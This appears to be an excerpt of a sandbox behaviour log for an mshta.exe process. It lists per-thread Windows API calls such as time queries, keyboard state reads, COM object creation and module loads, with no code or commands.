| System | Get Time | type = Performance Ctr, time = 24275564222 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24275570873 |
|
1 | |
| System | Get Time | type = Ticks, time = 242718 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 24276692079 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernelbase.dll, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x74f9a730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7500d8e0 |
|
1 | |
| Environment | Get Environment String | name = JS_PROFILER |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:16 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 242812 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:16 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 242812 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:16 (UTC) |
|
1 | |
| COM | Create | interface = 8F88FD19-5D42-477B-BD45-F6A4A977ED05, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:16 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 242812 |
|
3 | |
| COM | Get Class ID | cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 244546 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 24459156144 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24459164713 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24459170304 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-winrt-l1-1-0.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-winrt-string-l1-1-0.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\combase.dll, function = WindowsCreateStringReference, address_out = 0x75d0a150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\combase.dll, function = RoGetActivationFactory, address_out = 0x75d00fa0 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:18 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 244562 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:18 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 244562 |
|
2 | |
| System | Get Time | type = Ticks, time = 244734 |
|
1 | |
| Window | Find | class_name = MS_AutodialMonitor |
|
1 | |
| Window | Find | class_name = MS_WebCheckMonitor |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24477116835 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24477124268 |
|
1 | |
| System | Get Time | type = Ticks, time = 244734 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24477213923 |
|
1 | |
| System | Get Time | type = Ticks, time = 244734 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24478101386 |
|
1 | |
| System | Get Time | type = Ticks, time = 244750 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 24478216855 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24478278368 |
|
1 | |
| System | Get Time | type = Ticks, time = 244875 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 24490676077 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24490689016 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24490766585 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24490771730 |
|
1 | |
| System | Get Time | type = Ticks, time = 244875 |
|
4 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24494259070 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24494265738 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24494275321 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24494281795 |
|
1 | |
| System | Get Time | type = Ticks, time = 244906 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| System | Get Time | type = Ticks, time = 244906 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 24495012155 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24503284392 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24503443841 |
|
1 | |
| System | Get Time | type = Ticks, time = 250937 |
|
1 | |
| System | Get Time | type = Ticks, time = 251906 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\EUDC\1252 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25247306832 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get window text | window_text = 13624388 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = -16, new_long = -2100363264 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = -20, new_long = 262144 |
|
1 | |
| System | Get Time | type = Ticks, time = 252468 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25249529125 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25249646021 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25249798143 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25249915467 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25249972444 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleacc.dll, function = LresultFromObject, address_out = 0x71f2f590 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251195539 |
|
1 | |
| System | Get Time | type = Ticks, time = 252484 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251294519 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251304611 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251375316 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| System | Get Time | type = Ticks, time = 252484 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251409543 |
|
1 | |
| System | Get Time | type = Ticks, time = 252484 |
|
3 | |
| System | Get Time | type = Performance Ctr, time = 25251515956 |
|
1 | |
| System | Get Time | type = Ticks, time = 252484 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251669397 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251675194 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251683059 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251688533 |
|
1 | |
| System | Get Time | type = Ticks, time = 252484 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25254656273 |
|
1 | |
| System | Get Time | type = Ticks, time = 252515 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25254971690 |
|
1 | |
| System | Get Time | type = Ticks, time = 252515 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25255024354 |
|
1 | |
| System | Get Time | type = Ticks, time = 252515 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25255108724 |
|
1 | |
| System | Get Time | type = Ticks, time = 252515 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25255229944 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25255237683 |
|
1 | |
| System | Get Time | type = Ticks, time = 252515 |
|
3 | |
| System | Get Time | type = Performance Ctr, time = 25255914266 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25255931002 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 252531 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 252531 |
|
2 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 252562 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25259344270 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25259353849 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25259360305 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25259366725 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25259563196 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Window | Set Attribute | index = -21, new_long = 0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25263981824 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 266, y_out = 52 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
4 | |
| System | Get Time | type = Ticks, time = 252640 |
|
1 | |
| System | Get Time | type = Ticks, time = 252656 |
|
2 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
6 | |
| System | Get Time | type = Ticks, time = 252656 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
4 | |
| System | Get Time | type = Ticks, time = 252750 |
|
2 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
10 | |
| System | Get Time | type = Ticks, time = 252765 |
|
2 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
2 | |
| Window | Set Attribute | index = -21, new_long = 0 |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\mshta.exe |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x75bb0000 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
3 | |
| Module | Unmap | process_name = c:\windows\syswow64\mshta.exe |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
3 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77bb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDllShutdownInProgress, address_out = 0x77bdbbe0 |
|
1 |
Thread 0x9fc
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 |
Thread 0xf94
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 |
Thread 0x84
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xee8
1320
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Performance Ctr, time = 22845801553 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22847078555 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22847105190 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22848637044 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22848664283 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22881838682 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22881884222 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22883010011 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22883043049 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22888426709 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22888460499 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22888485314 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22888515123 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22890829085 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22890861430 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22893950482 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22893983145 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22895515499 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22895546908 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22897071609 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22897100783 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22900198026 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22900223685 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22901786843 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22901799115 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22904891798 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22904903994 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22948646571 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22948659773 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22948682249 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22948694315 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22950206748 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22950219232 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22962361746 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22962376056 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22963857716 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22963870290 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22965446905 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22965459396 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22968559611 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22968572173 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22971685909 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22971698547 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22975459066 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22975471578 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22978576046 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22978591901 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23013168165 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23013180690 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23016065460 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23016078449 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23019180810 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23019192744 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23020758024 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23020772782 |
|
1 | |
